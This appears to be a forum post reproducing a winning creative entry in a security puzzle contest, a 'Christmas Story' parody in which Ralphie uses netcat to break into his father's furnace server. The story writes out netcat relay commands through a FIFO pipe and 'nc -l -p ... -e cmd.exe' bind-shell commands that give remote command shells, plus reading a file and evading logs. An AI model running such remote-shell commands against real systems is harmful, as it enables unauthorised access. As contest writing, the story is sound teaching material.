Post Sat Jan 13, 2007 3:48 am

Skillz Dec 06 Winning Entry - Creative

Mike Tremoulet

A little more... A little more... I had it all!  I finally had all of Little OphCrack Annie's code.  I read back what I had decoded:

DRINK
MORE
OVAL
TINE
BUY
COUNTER
HACK
RELOADE
USE
NET
CAT
RELAY

I couldn't believe my eyes.  All this time, I had waited for a crummy advertisement for Ovaltine?!  I mean, everybody wanted a copy of that book, but it turned out to be an advertisement?  This wasn't helping me get my Red Rider at all.

Then I started to think about the last part of Annie's message.  Something was bugging me about it.  I thought about it, pulled out my calculator, and punched in a few numbers.  Then I scribbled out the eighth line, and wrote down:

E414A2208C930D79 4A3B108F3FA6CB6D

"There," I thought, "much better!" and turned back to the problem at hand.  How to get at that mystery list?  Annie had given one more clue in her message about netcat relays.  Hmm...  Ah ha!  I knew that the nc executable on the lamp was netcat - Dad loved to use that for everything he could.  And the chimney file had a p in the description; that meant that it was a FIFO pipe ready for use as a relay!  My old man must be using the lamp to hide things from Mom, to have left things like that out in the open.  Or had Randy been trying the same trick as I was?

I thought for a minute, and started a netcat listener on my laptop.  I decided to use port 80; if I was lucky, Dad would just think it was normal browser traffic.

nc -l -p 80

Then I sent the following command to the lamp:

nc 10.11.11.11 80 0<chimney | nc 10.10.10.10 2222 1>chimney

And to my amazement, I got a command shell on the furnace!  Quickly, I told it to "type c:\christmas_gift_list.txt" as quickly as my ten-year-old fingers could type.  There it was!  The old man had come through after all!

Then it hit me.  The old man!  Surely he'd find out about this!  And I uttered those words that no ten-year-old should ever utter at home - "Oh, SH--"

"RALPHIE!!!!"  My mother's voice rang out.

"Ralphie, you get out here this instant!  Where did you learn this language?!"  I slammed my laptop shut so Mom wouldn't see, and hurried out into the hall.  "Ralphie, come here.  You need your mouth washed out.  Don't you ever let me hear you use that kind of language again!"  And, with that, she pulled out the Morton Anti-viral soap from the bathroom cabinet and shoved it in my mouth.

Once she let me go, I ran back to my laptop.  How could I have been so stupid!  As soon as I dropped the connection, Dad's netcat listener would stop and he'd know for sure that I had been there!  What to do, what to do....  It was a Windows server; I could schedule a task to restart the listener, but that would leave an entry in the logfile that just might tip my hand.  Working quickly, I decided that I could start up a new session and restart the original one.  Fortunately, I hadn't lost my connection to the furnace while eating the soap earlier.  I gave it this command:

start c:\nc.exe -l -p 3333 -e cmd.exe

and exited out of the shell.  I restarted the listener on my laptop, and sent the email back to the lamp (changing port 2222 to port 3333), and silently cheered as I saw the command shell again.  Almost there!  I fed in the last command to restart the listener:

start c:\nc.exe -l -p 2222 -e cmd.exe

and breathed a huge sigh of relief.  It looked like I had gotten away with it!  Dad would be able to see the connection if he checked now, but the odds of that were slim.  Still, I had to create some sort of diversion.  What to do, what to do....  The old man did love his turkey, that's for sure.  I was counting on that as I connected to Skodo's FTP site, pulled down a special DLL that he had told me about, and ran the DLL injection program to inject turkey scents into the furnace output.  The smell of turkey ought to keep the old man occupied for a while.

I could smell the turkey scent wafting through the house now.  And then, I heard the neighbor's dogs charge in downstairs.  Oh, no, what had I done?!  I was in for it now....
Congrats and well done,
Don
CISSP, MCSE, CSTA, Security+ SME